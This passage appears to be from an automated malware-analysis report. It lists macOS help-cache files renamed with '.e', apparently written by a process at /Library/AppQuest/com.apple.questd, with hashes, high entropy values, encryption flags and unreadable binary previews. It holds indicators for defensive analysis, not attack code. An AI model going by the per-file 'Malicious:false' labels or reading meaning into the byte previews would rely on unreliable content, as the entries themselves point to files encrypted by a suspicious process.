                                                                                                    SHA-256:949E43C31C5DE91A1F9A5FF6404DC3EBE4A05C3E5D3D908F9A3EB9DB19E3D13E
                                                                                                    SHA-512:CBA60B283AF852EC8F09D0BD1B310071CDC9376FA2F7180C2192C5B800CD97EBBC4C926A1AFD846B1A1D00E785F5F392716E0F59D1053E86C68D813C76DC8704
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 6.)/...x..spT..p.e...h..<...^.I.....F....wJQ.....J....t.9.O.k.^}......U4.....@...Rt....j......y...U...<L.......R.J.A..~B.Q..Mf....Lc2.k...T...)9..J.F.Sz.W`.I.....zk.x\.4.. ......H...Vq.....^..~|v.,."..p."fe.i.......4;...h.-.q..{-....W..tN..-V'...j..4.g.....?..r...7^........:...... ..R..s.hH%.+.~D..P..=..`.N..4v9.V]T8H..;>p2..4*....J..W.......%......W..s.siFq3......Q..c[.l...I...............e...7..g.0vR...y.-.Z...@. "-....5t...0Ag.CqX\T....p.3O...TU.s.E.2.. .....9....$4.........@.......c^.J..O.S)S..Y[.u..d.V...F...*."...u".....wb.')....'.....e.l.B.......lX0SK.C.%...hf.....;E.....Z.G.3.N8)=...#..` .a...6...z......P.N.j..[..[..i.%+{N+|....t...n8......%.u.....23u...g?b....X..M.BW..X..?k.cf..9)..M.A..>U..>.r2..[..RVSQ.S..... ...Dr..y.@B....k.).G.X..3.Q5....Q..;R..\..?o.h.*....i.|,.....4.i.M(..p@.=.}..!....9I.......Hb}8.Il0fg.aA..........rZ...q..|y.%Jf.s..+..N.Z...C..S....*......}5.......k....H.>........J....s..P...hUF..e.X..~^.:.L.mj...#...E...z.....C.A.....S.G7..b....[.^....Y.....8.....5.H
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.ImageCapture.help*8.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6506
                                                                                                    Entropy (8bit):7.9318016135079255
                                                                                                    Encrypted:false
                                                                                                    MD5:92ED2AEC0D4F0D5DE3376BABF08C87AF
                                                                                                    SHA1:97E7979A16DA15E1B366718182C0F65264017456
                                                                                                    SHA-256:818F8526CE1FC8F178A70711D2166C253D1EE5675C84515FCD0D61A1252E9ADD
                                                                                                    SHA-512:D84CC9784B7298FF4498E33193FB0894ADAE7C9CB28627C0F787A1B731568B328839E7487E3D6DF79B37D5C3A46BAAF96F2015BDF07258AB81BF29DF0376E1A0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: 7.....u{}.u...g..]~.N._.=...;%..i...Y.+.(..[..>1...D...[h.....t..BR...(K...=.........Wn....[..'........v...yf....U......h.Y/BWu.......q...L.H.h...%.........?...%[...9M..-)h.)....i..s,..S.?A...!.......S.......e~%.........x!`.(H........{.AQ..%{....4.2/...D.=.....X......ao......1......Y....`i....`....W.....M.P...f.....Fq..g.VO..D|...=.....*.qc...h.w..@..3....j....q.;...|...5".U.....yNH.F.....v....l......._....D......F... .<...E>g.F........"A6..E#....1....>.yDD.b..H...7....~..._.l..;.}u.he.e........|N....r..%..5...8).+...v.....q.HI..A...u............M......./8e.z...C...}.r..a.Ka.../...2....q.w...D.Ri"^...=.c..]..X........e.5.....@............Y.M*..d...^k.?......d.....n..|.......;.....'.-).....:.........:n9.....#Eui.9.g.oH&.H.......#.~.......X.a..H!.5Z.a6W.$.K=.d.X..P.(T..=.O..v&B9........[{I...K....h..B....4"........U~p..'...X.I....la.2tE.9[4.N..T.^r...A.9..#S......7.Q.....A...n......o.b..%....Y..5[.....qn.8..M.m$...z.o......h....v...f_.e?...i.......t..VV...[?.9......Qb..g..#.X.lJ&.^...o.i
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Mail.help*12.4/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):99608
                                                                                                    Entropy (8bit):7.997980276545932
                                                                                                    Encrypted:true
                                                                                                    MD5:D3F3528A196F71E40C8E5802667EF480
                                                                                                    SHA1:A0F5340533063F539BCB0545B92FAFEC5B60E63D
                                                                                                    SHA-256:20ABFEE4F3955A871EE8C9DABF847D404FA5F0FC31CB5941DCBB8CDEA1184FFB
                                                                                                    SHA-512:BCF1F808FC71C264E17E7D0D79EEF727DE3982CD7DEFAA7608B5376D65BB0C34FDAE557CCF090538ADECBB23B2606A9ED531366064EEFC96DDE41C8AA932DD2B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....O.m..|...n..`...J"..e..D\..t.z..c .4..%..........*..q&..".]XZ.F..]...$.p.>.. .l.I...d..m..n5....:.....5.8w......c...P.....XH.Z.>.:N....X.c.z.A.....-....:."V.....$_....7.f........8[.h./.......}h...8......~2W.P..........S .m......Dw..........)sce+.W.'.Xp..6V.d.%........#....._...-M/.../^....."....rw........W.r......-.....&YQ...v.:Og.....7 .)..V.,..7@.'Z.X....z..)./..n)^7HK.....,.....oB..\tQ.[N....s.t7.....c4'^("..... Q_%{...._.H....9....c.0.Y$..&....A..W.p..={-.AFyO.!V.;..g3....1..W}D....].O..o...G*....K..B ...v..:Du..v'C..T... ..O].......(......(..TI9.u.........N.x8....^..>N^M.k...TN......\.w$XK<..h...o40..'..W....}.....].4....o. .?.).......`.5.@...AI..M.~.\..qN.=..}l.g4.(}r.....*.p.:.....qw.)M.n.}36.5...h.;5iu..#..... kD......b...K..a........[q...^...=_`......2C].~+...*B...Y.....9..)...~[L.)........O.u..(.='].b&M*.....[r.X.^.y....G...cv6!..'.&o.h.....v........b.......s.E...f)..8..`..Ss....AQ9.-..<.(..&.Y......W.O...o..j...Q;......=.~.^/{2.AIR-....KM?..o=F....U....U.O>.........p..,f
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Maps.help*2.1/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12002
                                                                                                    Entropy (8bit):7.968240557040584
                                                                                                    Encrypted:false
                                                                                                    MD5:884755CD542C55768368DA5B0887946D
                                                                                                    SHA1:776482DBB5BF13F060AAC4C9CCEA2FDEF8E8A767
                                                                                                    SHA-256:0835CD5CBBEFFD9E2A83C564594BB076E8BB3FDEEFFAC20FDF9A65406B4A3AEA
                                                                                                    SHA-512:846B48B2DD39DD9E655A608BEFF22897859365CF4C032295EE26457B51E777371052246B73FFB3EFD1E387BD64E04BD78F0EAD8436FE354A54459A06BFB74FA8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..;"a.........x...ym.:.O:.`q.....K...).q...}.&6..2X......G.[c.Q.MT3A2....bW{.....l=,.%.u....kt.}.7;s.....D..|..)2..g....;3.S..S.O.Q.....jL..*........L..~.....U2..\.(.....!...=.....i...k....Zi.5.,.)..U..Gu^.D...fH...T....r.<......D.,....Ja..T_._>...d..u..G..Q..;>..Z....M..s...%...._....>Y...9.F.j..2>B..j.~.^.)Q.k.o.(u....3tL=..\/.K ;..aYQ...r...cs..P.....q.......&u........[....(A&.u.w{.R.EW.......$.*)q...#..).EZ...u..l....e...9&B....V_...?...`qo....=...p..7'.7,p..QE...D.Z.......X...j..Mo6..mz.5..N."._9.&=.j........\W.='...m.Q0..S.Z.Kx...B.z....)...y...~'..ZI..U...b..Wo.=.....f}.q=..9.R.@..2,.w.........4[.Cs...a..e{6.@3n...110a?....Q.Ql.;m...............:-.p...<..5bn.A..S.M'Rx..!..N..U;.\......$........8.....u......\R~..}.F..5r......w..RJ..J$...A`b_.P..(.....(v....<...S.>.p........b.....AU.cq+...I....w.h....s..w7.....C,D...<{...T......d.zc*2...o........E...0...UK.6.NL..c5,K..^.zE.....&.%...y...=Hb.....&..l.s.x#7Fe.*7...6o....D.5.k.B..1......6.:.M.....Q...P!..tW..N...}.n..G..k{......4..En
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.News.help*4.2/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):17843
                                                                                                    Entropy (8bit):7.979397568690006
                                                                                                    Encrypted:false
                                                                                                    MD5:3D488CB95896F2577C73E7287EBEE93B
                                                                                                    SHA1:82541EB73B306071533F0EF97C179D9A90DAA6C2
                                                                                                    SHA-256:4D878169B2B67F8C12241CB3874D75107960DD429A82A1818D392803FD9F0D9C
                                                                                                    SHA-512:5FF6042A0AF91D668694650C1E632DC93647EE50CDA030483A986342DA425633CD2D495CB910A3E7E03B8AC66F3C15DC6D94587DDD4103B9F9212063378D202E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .)N..MT<4.........@6....b~w9...T.z..c .4....%...,+.n..W..1.....m0+...,.K.8)...E._&.`...[#... !..c..o..=.!....t..........@.........\".7....ap.~..X..LT[cd..h.%........m.F.yT9.Tw....+...t..O.z.6;\R.FZ.....f.S.t...GY..$OUX.........T$.:...z.....o._G._R...:.y..~.....c.r....aa..b...t.....|5.T....4.x.....9._.}..<.....L...n......o.E/..~3..K.X+.;..GCL.......f..Z..F.....nJ.....Hn.d...Z...m..p/v............@.......||...p..p......8..yK:....w..K...,.../......3....*..lO.).>L.x..z;.o..........[.Lup......:V..A.....8.T.4...<..!.bV...|{.)%....P...RH....r.kf5...O?V...%.1..D.Q.2}....hd.M....lE.t.....t.nZ...48.....n.@:...5yH...eQ.d..y.....!...,...cS.8.,N..E....\..0\}<pW.:.r.H.KA`]yk.&.......$..a..:.x9G.u..\...... n"RM.U...o.GF.....HJ.|.eD^`8I..+.@....]...vM..8I.4..`a.6..5V:....6.y;.vj.I...E.N......f./.#.>i./...o.. .R...&G$..v.[73........j.V...I.C.....].....u.....a/.)..VK.....:..6...........2.]...8..n....%A...1....>.%.gf.Y.0.....t"X.0.;e..Y&..p..4D.Ik.d..[...e.j...^&........U&bM...A.|.Q.1F.v.....[..v.k.D%.,.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Notes.help*4.6/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):27507
                                                                                                    Entropy (8bit):7.990550594659414
                                                                                                    Encrypted:true
                                                                                                    MD5:B0D3A8EAFD74508E697D8C825F0F8296
                                                                                                    SHA1:6A5FFAC6F877FA062951FE079DF5688DF12B32CD
                                                                                                    SHA-256:DBE09CAE1AB26D382F0150C0E0C4ABDF1648D0FC6D1FE1A899E1F972EF07CE8A
                                                                                                    SHA-512:DE9E20730F5F6328B5E4D8FEB741CE9C2B6F62685BFA068806699CACA09423EE067D89D3A73D088DE079D84C9844493985EECF02571817306F4296AAF9FE2396
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: t.~?.y<.h24..#..r.i...7.:.3..T.T.S.yL.1b......4.........x......n...:............w..+=..-.1...<>.....c-.y..[....6.=..]I:P@.e..k.I?...{.c..$PB..\....w.....v..{..C40].z..2sg[.5fM.........H.LQ...o........#...............^.W...6.utM.zp.S_.&.)9...".q.*~O..nk|&......nY#..H..........yD0..W.`8(..t..0I......./..G..I..Y.O..&...Y.@C.6.~.@..c$M,.|.#.H,........."R\......X!#.$.)&.,..@.'.......3}R].K...66.....T...zk8}`@z..).R......_P.....T.1z...gP....U..._..S^J).>....)...#.m...a.xV[2..TF......6VX...d...^..x8..p].....s^.hv.&.....\X.?H5.......f.+k.E..x....W@.5.4$...........[...........c...+..y*.k9...jla.......D.&.....S.... ....%...]Z..6!.....p./:..v.$...Q..d8....L{.5....6..0W=X....1L:;..P:}..h..q.0.....*....KJ!*L..W.j.H...3zx\.JJ:...p.H*.5+@.......X.$,...>q,no..,.....).P.?..sN.p.........kU...!.&..+.<T....3P...?.{a}TE.pkV._......'WD...U....;.h.....c.+..OM.'....C`7r.qF. ...g.Lx.".5..0.<i..Ck.C..yV..9c@M...{...R.+Ke_.Y.;..._5o...._..!FY..!...e..>_L....*.t...F.Y.p...(..J...F..0.I.R..W...+..r..}P..#7u.<..d..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Offline.help/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6458
                                                                                                    Entropy (8bit):7.924057878781189
                                                                                                    Encrypted:false
                                                                                                    MD5:BD0106C061DA12918FBF03537B85A4BC
                                                                                                    SHA1:B6DBCD2A0F8511B652FF634D40C28DF18935C57A
                                                                                                    SHA-256:77DB6057E229CE5EBE24D3A20C47D341358E4D9B911D7DC458582EFD97B7A87D
                                                                                                    SHA-512:A434CBC625479E01970DD605AC2C3B597B27F0E5FEDB066DD0293A41DF2AA11CCF6EC9999E2187A424754FBEA26C50571B0E950DFFBA7980663696C2BD11365A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .-.....J.u...Z..[....G9.~3.D.9...A.Z.E...P>.@....|vw.....i.lu~?>C.G.U.LLaS....@....V..-.$.........Dd^mr@h9.x.Ne.5...7q.%_...I2t.D.A..O?[.Chs..*.E..+K...>.rc.....@.\.C......b...},....]..7.F..*..9....?..;(G.+..s8.41......R.....Su9. s-T)...t.s.W...{.rT....v+5L..].f..5...".P.~.c.y.l.*%...h.P....4u....>.g...n..,...<....nZ...?.c..9.E..G..9a...4*.f...C..u...t>....:.=..T.'..*nj........T..1.1.i....W.G.M....[g.o..../S...`....*.A.P....F....p.....#....$.b..In.rz.e7...L.i3..r.`.Cv........CE.g_.F2..t....?9...x.$....d..U../J.....e..O0...EL.....z..,.7.....R...bj...sx..odV.n....g...8.$."...M.l...~.....X*`.$.....n..........:.O..6....U....=...sJz.....<.....R.......J.BS[.....rF.e.vE..R.62.%<...k..n6~.N.Y.^d<R.Al......V.......-......f.&U..h.L.G.UUy.:..\CC.E.....>.0.....A-.C..M.....oAB4*.H.Z.....D.../..h...D...!.C..S..........(.w........_.8.8......+.s..8n1..P.3.....)..L....7..M[<.B/.B.|.4.)B.u$i$.z.N............#...F>p;.\.C...U.."....s..'. .....k...Q.84.......C.A..?F........U..Y.I...[....&..{Kn,O.E;...d|...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.PhotoBooth.help*10.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7290
                                                                                                    Entropy (8bit):7.931505579861867
                                                                                                    Encrypted:false
                                                                                                    MD5:843C7B030E786EB8C9402F0EE3EBDB83
                                                                                                    SHA1:FDAA584A153D810A1B59399ACD5E7046E5F99074
                                                                                                    SHA-256:7641FA41F3553151B149786CA2D828D07554218B55F1662DF8F9DDF2BCA84C2B
                                                                                                    SHA-512:CF4184B735D8F2718F915D40D68A1DC74661D48C8DFCDDD7B2A45A5F2637534072FF079CFD8D10F2CC9D24BE02FD49ADB2CAD5A53EB73274F32F67DD9C0DE0DA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..i...#.........*%....w{..r....I.],..(...`...4..........L.$.K.\.K..v...&.~.j.V...~.^..;........v.....9......."LGq......l...t<C..D59T.4.k.C....B......./V.^.b?.....#.......W....e.C9.......9....3..............8......!..~...Wi.f..^..*...E.B6..dF...C,K.P-R,*.]v.....".....2c..h..\.P........*fY).....fi_vM,]....YL.z..Q...7.7...@..ZFcL.......]..Rt....S.u......L..g..M.....].%b&S...72.}...V,s...cg...:..g.X..e..+L...Z..*y..S..]..... {.|.Gj.=u......]...dO>.Q[p.K.m..h..l...4...<...BLZ...3.C.mo......Z..Z9.!>.~|.j..y......d(x..x....4:v.>....F.J...;DN>R..9..J..K..n.".Q.Y.U....:....;..+Q.E('<.)....v.)X;....`1...Jj..u...k...X\..=a...Y..@*.........@.......B....v.".b8>~..n...-......3/..&6U..WmO...y.@.V>C........~.f9.#....F..f..|..k%......N.}...........s..*.cF..rL......n,.....%.d. i....])...NkJt....c...;c.(.......|.W6...>......0g.....5.b..A..........%.%`.......wux....?4.......W5].........S..'T...... .E....'....>.r..z.?.....]._....#D....#4....M2..qV..Vc..vz+h0Bcg.N..Of...Q....i.w.^,^.n...$..Vad..5ps[......x.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Photos.help*4.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):82078
                                                                                                    Entropy (8bit):7.997531197468022
                                                                                                    Encrypted:true
                                                                                                    MD5:501B4D6E07905E2E7042EA1085F59058
                                                                                                    SHA1:C5C61710EB10FB7B0C8EB21F5137BDA141AE1D74
                                                                                                    SHA-256:52B9C4D3A946A63E9C2C0EF4EF3D7E62D6BE24BFF8CA43EADE7D3D660C544A06
                                                                                                    SHA-512:023BB31B544D4874EC09D53DDF69B68B196986618118A4F97625F4427D9EA1C147FE87266B0E27849C845D1A13659E3011B129E61889AF04E9148E9EA4A37C76
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: BI...y.{..!...e.V.R..jNle..D\..t.z..c .4..U......>.5...O$=....}.....2..6..*~s..uN?<...y...j.-.C..!..).....`.4...L..*.'W...#u...,..Pa]...1M.........K.h...+......Y.....O.......8[......8[..B.E..'....w..9.........=l.@P.D..9tN.>....7*..(.a..a...L...!.....AsE/.s..j..;j..EU.r.....y.e#..P.`..#.._.W.vf.'...a-#.....o.....0..(..ms7.....M.........;8..x.j.l.....j.s..Iy..h....=.........\u~:A..w..$8....&.e......,.a..x..F&.......'.....sl..h...U....s{..e..........d..5.....n)R.c....@.-.K...M......:.._..e.X<H.1.[cf.NW.e.........y]i....U.........N...Q?2uV...^...@.....*.?...y....&.3%f..2...=+..N.C1:..c..'.....D"..V..-,\.{. ....v?..-.....3iQD6..PIc".....+.h...8....5.,.+.P....#|.%....l*Uw3b.5~.=8.\.&...K....yV.G|...*]v..Z....4........].......l........d&...gCK.'N.....B.0..$~.f....NR.._.VAx.......%.R........KM.uA..CG...A;V..P.:#.uZ[]......)......?...L.,,.>.".B....!.o..yA..B..<;........5y._..!...T...!.}. v..*.b...#.s#D...p@a....}..TBJ-f..@!..9.v....V]........(B.....1W..n.E.k..!A?..k.N..o.%...f3.SZT'..YA..P....q
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Preview.help*10.1/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):38260
                                                                                                    Entropy (8bit):7.991944234288467
                                                                                                    Encrypted:true
                                                                                                    MD5:8D5E706DA8AAABDC0D66143F654B6CEA
                                                                                                    SHA1:661F1E63369EE7F1636C55D4115C679B37E37C4D
                                                                                                    SHA-256:B05BE87A03111E2FFF0A3B12D37CF6C580C57D45CC8FEAE92381AB14C7884238
                                                                                                    SHA-512:D8FADDE6F1FD0ED94EF495BD53142AA12B120443567335DF8CAFA5E86D2666399BFECC591943FFF104BE46328AFCA555D7DACC56B5500B9E6FA33A212272739D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: `...d.@..*._O...0}...}.%.N9....."-.....U.h*.1..&...Y...{.y.N.-.....@.53..9............:......b.Ve.....uA@.h.x..!D;..D..R..!A?...}...+..*.t.."..7Zwx._...").5Z~8.e.....+.................y..!7.......n}...Mmx...Y@..!..).%...".D..J..W2.|...A..WMJ..).7...r...l{(b.x.6...>Od..&..3...P}....qM..W\..?=.. Dd.M...G".....q.z.>[K..K'.!.v.H.6.&.....M,.UD&..*.&..,k"...;?...U..q..sz[..}K.E.....E......K/9...........k..8....d.,cY..U.....V;:.*.3T1.....N...+.5..joW}%.../.@..H..j..b...JI..]a.Z(c.5.......FI...WQ.K..g.....}......G..).E....f!...u..Or..X..`..7\....\1.....v...q...ma.=.-......x7=?Oc...H....4r...v.......k.{.....:.,.....l.....7D.}..G........`..oL..R&..'.I.?tE8.....f..d..N.@...Do..,.!..?...H...>.M..<.....uu...c..H.;qsS.r5..=q..9\#s.."I.?..sC@...........".s...fQKy9..?....5..c.........0...{.+L.m...Y.m./c"....m.U[....Zm....U.0.i7]......a....,|......./......../...C.ZC+.ei..^.|U...i%..../Z/N....w.ew4~H.V..............K.,*....8.4.....<.?..@..k)nm......FT...93\"B*3q..Y.......a0.t.:..;.C...I....^.K5SJ2f..|._
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.QuickTimePlayerX.help*10.5/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):15538
                                                                                                    Entropy (8bit):7.97878329883702
                                                                                                    Encrypted:false
                                                                                                    MD5:22D1687DEE31FEF4FE8E8E86285B924E
                                                                                                    SHA1:7EFD992FB9B9038B99D76E4148DDADDE2FB6D352
                                                                                                    SHA-256:747003F65A0BAB9EC3EDD3E155EF8695C9DB1ED33A48A68D31F07BCB80D58A98
                                                                                                    SHA-512:80101EAB1D324F246C6EB8916EEDA7A2838BB2E67D3C1B861E0B9AB4A8AE18A5EE66193D076C53B168CC47DBDC38B54080F18CDA068E669504808311A049EC64
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .v..]......,...VjX..M......Y..3.76.........B.....m......3..oQLp_..S.......T8..hD.:lj.a..p=....6..y.Py...?g....m=.0..U+...?.Ylk.....~J&...q%..c....E...MB'..8..!..gwq.8..w...Q"3B...IJE.aZ4...|....M.......%+..+.N........n..!..].1N....4..M%g.c..o[...........RT.=......(.C....q....-2......D.c.....$>D.n.....x........$.p..Kw...Ao...ja.~....L|.q._Vx...U.....s...f...g.>...|.......N.Wu."j..kx..z#.....*b..&........9....#....K.I...w0..Z...~....;...4.v.a?<<T....,G.C.........m._..0z......@D...N.E.R..q9=o~...c.Q..F.m...._.Y+....8...9....eq....(.A4h.[...?.....!.....n....UF....!i.d...;$Gq(..j.71...9S..9..O...X....?...Q...8......5.....~L..+. ....f........_.t...Q..Bz..I........o....6.zStM..m.]0i......b..Wf..C....../.....?...o6..J.#e..o"..:.......F.3.8.==.T...Y.<..v.Y..d_.h....T;.X..C..We..F..9h...".z..dP....../o....=.?..S.....S)\.A...e.._.1..1.=..V.SF..c.....+F..9....R..\..g..fN.~.WV.8..!...UR.....D.M$....v...q...;.\/qS..G.wD..y..TX!..A........LN...%LdG.es..Oj......N..r...P.jb...U.82.q........P.7.Ws.o...h
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Safari.help*12.1/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):86199
                                                                                                    Entropy (8bit):7.997261614920803
                                                                                                    Encrypted:true
                                                                                                    MD5:AA682285909E6C9557E48212C252B05C
                                                                                                    SHA1:92AA96BCACB3315A2B825C15733D7ABF8B1ACD9B
                                                                                                    SHA-256:20B8FAA3148E65F4C13AA2E68D6B7B23CD10C19F7EBCA9EAE3D98C664580AC7C
                                                                                                    SHA-512:ACA9F3C928273D067AEC0D7FD075ACA89CBE535A7F33907833E2B642E1245C6637DE0111D538E41917BB3CCB7F947DA56BD1680FBF0A4FCD8AA6E2EFBBAFD50C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .......b..)....>.fc.....\..9.q[..z..c .4....i.....~@o...............{..]....m./.A".6`G....M.,...`.2..T.).J......s..q3. OB....(....=-L.{.../|....FbK..Q....Jd...N...x...).................... ..]..../.!x...{_H...q...x...m:c........A........;e.OH...t .6...2....).$......r.:.(....P.^.q..-N.}......"........S..#.d.8.....I.....v.`.y.4..7FI....,%4..'...@.K...,......}..S............G..!....O5.5.btK..j.9.......P....0......i5..owfw.0.1.=bu[&^~.....f....{...G....q..Ov/L.!K......K.]...7........#..e.S.w.%...e|..."...E."U.}v...g..............{+.v.......Xv....-.B..-.....3h..d.xJ.....`...\.J<..W.y..2.cw..u..J~+:.)y...`....{K....d..x.m.l....:..]......+.yE..g.F.I-F..*..y.c.h^.#.*.1...`Z.y.BQ.".g.j..j.....|..-.XK..3k.|..B4[t.wZ...-.'..`I8,.....,|J.W'..-z.wV....d.X...HC ........L_.X.\.[..W~. ^.Y.,....K.>.&....H.x....j...o.......C^.}>..X...Jo...co`..ZT.5.Z..[..........).a..I....`?.L1....1.....p8E.:... ....;|.7C..sFI..H.O.6...|...q....[.og....{...=.^.A..c.'...D..7..s..BL.{.M.1.|...UR.7H&.E|D>..R....}....#.Y|..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.ScriptEditor.help*2.11/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):16875
                                                                                                    Entropy (8bit):7.97998454059674
                                                                                                    Encrypted:false
                                                                                                    MD5:FBDAD2E22C8E53EBF41E634D0F252571
                                                                                                    SHA1:898BA9097843C16507DA5036CBBC91D96C43D2D1
                                                                                                    SHA-256:E98BC441C4864A3A7FFBDACDC8C7BFAF320D9DFF0B803556BBE44BC157018958
                                                                                                    SHA-512:995ACCF22A2AFE577F1EF936E67591E814C3A152537DA95DFF094AD6A2EBF0CFC23D582536F9FB2CF576CEF07FB1CEACDCB804E94CF25BFA324A900A6A09779D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................t..& ....k...b.w.=4.X<..+........#..u?.HR=I.o"v:...1..]#.T....*.....NzSI.....%.X@.<..6..m..P&|v.^@+.4#...!H.0...Tk..Y%7........@f.b...X....Q...<....9W....|^..........<.....p.Q.U.}...XX?2...bi......V.@....#.G.EB...>]L..S.o.0F'...$M.4..Y.i.tC....T..t|..Bh.....mOG0\....|....*.p.H.`...l.X...{.....US..5.J..w.-.!.3....(.".V._...=.T...o8f..,..h.0.`.`..J.P.S%&RaZ.#y.=j...H.Y.....R.:.l..Lm.....<....|.U.Q!.}.S..f...j...m...2......0Oj|.k..Zo....J...r.-#o..a.C..f.X....5...{HLt.3j_.FWz*..Q"grs..k....-..I.B..p.?..rn.u..$.<3.......!...$...2p.C...#...Kd......c...?..}l#.m..."....`n@SL..d.:.....\..a+.....[...bMI.#..p.&3pC;...af..)..V.9.<..r..i.c,....]Y.T....:...O3t...L.+.....a...Dj........X.i&.L.t_'.*.....F.f..........{ K.9'.....A.......(.@....MF.{i...5......Dku.......S.g.kiL...h.xn....:.....#..K...{........4.l=<^....i.....l.[9..........e"...........G7....?.X..4:.....|..DHV F.m.G.ii..9W...<..1X.......k.....<......W....S..l.!s.Q_..G._......n`.....R-.\...#.$..~_.}I..l.yz....D.oG'(...D.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Stickies.help*10.2/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3298
                                                                                                    Entropy (8bit):7.8283066269161585
                                                                                                    Encrypted:false
                                                                                                    MD5:9A21A16E968D442604382782D90520D7
                                                                                                    SHA1:6034DE5B5B17A9B8D35EAD415E575B0336E3962A
                                                                                                    SHA-256:2EBD598F122ABD068E23819883997F2091DA0EF685ECEADE6BDF1DD31D6572EB
                                                                                                    SHA-512:C69F9C613E4BEDA8A24AE4DAE4326731DC1F50D42889549C7DD3C288898D14EAFF30A2497DBBAFBD6C98F872B73C131ECEC14029E5B2D7C80287F4A69168B0E3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .7..\.5SIGx.....HRL...e..y/..@(..-.V. A.#V/!~).;....7{..E..p..c`^..V_!.....?..8c..ycC....*sS...G.[...4Yh...g...4.;.D....J.Z.... ..z...D.....$...E5...6.@.....Mh...{.......D..rVd.v'......Q....}..!bd...P....3!.m`.Y.T#!A"Y.5...wH1~T..9B\Z........R.B....h`..cl.O.A.E....M.../5...|..D......^M>x.....}.h..TM.....A:N'.c...{h.............6.:o.P.=p.Z ......!y.........BCA.F..L..:>..u..G....@.....{..,.........m!=..$Dv.6..)......5a...s.;M..:.........Q/...9.}.:.U...tAL;!....D.,.F...7.!.c..<...R)P..!.....'..f.7.......g.e..........j9..J...B.3.oJ.Z..&Mm.I,.W..K.[du..z....U...........5..7..2$.......,*.4.3@....9......N.t..h.".k.#!.p}.>.....[!..@..|..h(.............w`.M.6z..q..../.>d.....].JV..;T.#Ac.y%.["..p.g.).'sQUu.......s.......H.i:T.XN...k.....+.B...62.b...?.`...r..M_w.y...I...........(..:....q.5...x).8L....'...it.....~.SI^...hPL4..8..xd..p..a.$...."..5.L.{.....r;.U.v.pl.\i..R.N...0.*h.m#.....={..n"....H.....O0..m..~...Z.P].....,...gb..........'.....l<...]...W/...f.8.V.ea:G.3.8..Zf@g-}.Nuy...s.......W
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Stocks.help*1.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):8298
                                                                                                    Entropy (8bit):7.951208950171706
                                                                                                    Encrypted:false
                                                                                                    MD5:AF4E10A5977313AE570D44BEEC91B86A
                                                                                                    SHA1:D52842EAAAF0858CAAA8695866B4FD56CCCA048B
                                                                                                    SHA-256:7A799898B169849AE81BDA52E72DA8D615AFF25A8F0B25092E0E32CD843CEBB4
